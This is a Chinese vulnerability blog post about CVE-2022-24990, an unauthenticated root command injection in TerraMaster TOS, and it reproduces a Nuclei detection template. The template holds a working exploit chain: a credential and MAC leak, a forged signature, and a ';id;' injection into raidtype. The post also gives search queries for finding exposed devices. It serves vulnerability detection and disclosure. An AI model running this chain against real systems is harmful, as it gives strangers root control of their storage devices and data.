TerraMaster TOS 未授权远程代码执行漏洞

漏洞信息

漏洞名称: TerraMaster TOS 未授权远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2022-24990

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: TerraMaster TOS是一款专为TerraMaster NAS设备设计的操作系统,广泛应用于家庭和企业环境中,用于数据存储和管理。该操作系统提供了丰富的功能,包括文件共享、备份、远程访问等,是许多用户和企业数据管理的核心组件。

该漏洞存在于TerraMaster TOS的api.php接口中,具体为mobile/createRaid功能模块。由于未对用户输入的raidtype和diskstring参数进行充分的过滤和验证,攻击者可以通过构造恶意的请求参数,实现远程代码执行。这一漏洞的根源在于系统对用户输入的处理不当,导致了命令注入的可能性。

利用此漏洞,攻击者无需任何认证即可在受影响的系统上执行任意命令,完全控制目标系统。由于攻击者可以以root权限执行命令,这意味着攻击者可以访问、修改或删除系统上的任何数据,安装恶意软件,或者利用该系统作为跳板攻击网络中的其他设备。此漏洞的利用条件相对简单,只需要攻击者能够通过网络访问到目标系统,且目标系统运行的是受影响版本的TerraMaster TOS。因此,该漏洞对受影响系统的安全性构成了严重威胁。

产品厂商: terra-master

产品名称: terramaster_operating_system

影响版本: version <= 4.2.30

搜索语法: app=”TerraMaster-TOS”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/897e562c368569335eb1ad006b17ea9fd3aff74d/http%2Fcves%2F2022%2FCVE-2022-24990.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

id: CVE-2022-24990

info:
  name: TerraMaster TOS < 4.2.30 - Unauthenticated Remote Code Execution
  author: iamnoooob,DhiyaneshDK
  severity: critical
  description: |
    TerraMaster NAS versions through 4.2.30 contain a remote code execution caused by unsanitized parameters raidtype and diskstring in api.php?mobile/createRaid, letting WAN attackers execute arbitrary code as root, exploit requires remote network access and crafted parameters.
  impact: |
    An attacker can execute arbitrary commands on the server, leading to a full compromise of the system.
  remediation: |
    Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.
  reference:
    - https://github.com/0xf4n9x/CVE-2022-24990
    - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation
    - https://packetstormsecurity.com/files/172904
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24990
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24990
    cwe-id: CWE-78
    epss-score: 0.94401
    epss-percentile: 0.99970
    cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: terra-master
    product: terramaster_operating_system
    shodan-query: 'TerraMaster'
    fofa-query: app="TerraMaster-TOS"
    google-query: intitle:"TOS"
  tags: cve,cve2022,terramaster,rce,unauth,kev,terra-master

http:
  - raw:
      - |
        GET /module/api.php?mobile/webNasIPS HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS

    extractors:
      - type: regex
        name: pwd
        group: 1
        regex:
          - 'PWD:([^\\]+)'
        internal: true

      - type: regex
        name: mac
        group: 1
        regex:
          - '\\"mac\\":\\"([a-zA-Z0-9:]+)\\"'
        internal: true

  - raw:
      - |
        POST /module/api.php?mobile/createRaid HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS
        Timestamp: '{{unix_time}}'
        Signature: '{{md5(substr(replace(mac, ":", ""), 6) + unix_time)}}'
        Authorization: '{{pwd}}'
        Content-Type: application/x-www-form-urlencoded

        raidtype=;id;&diskstring=XXXX

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=0\\(root\\) gid=0\\(root\\)"

      - type: word
        part: body
        words:
          - "createRaid successful"

      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
TerraMaster TOS 未授权远程代码执行漏洞
http://example.com/2025/08/04/github_3456411012/
作者
lianccc
发布于
2025年8月4日
许可协议